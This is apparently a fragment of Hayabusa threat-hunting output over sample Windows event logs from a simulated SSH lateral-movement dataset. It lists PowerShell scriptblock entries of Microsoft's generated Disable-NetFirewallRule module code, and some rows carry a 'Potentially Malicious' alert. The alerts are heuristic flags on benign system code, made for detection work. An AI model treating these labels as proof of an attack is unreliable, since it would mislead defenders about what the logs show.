[Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetFirewallRule' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = 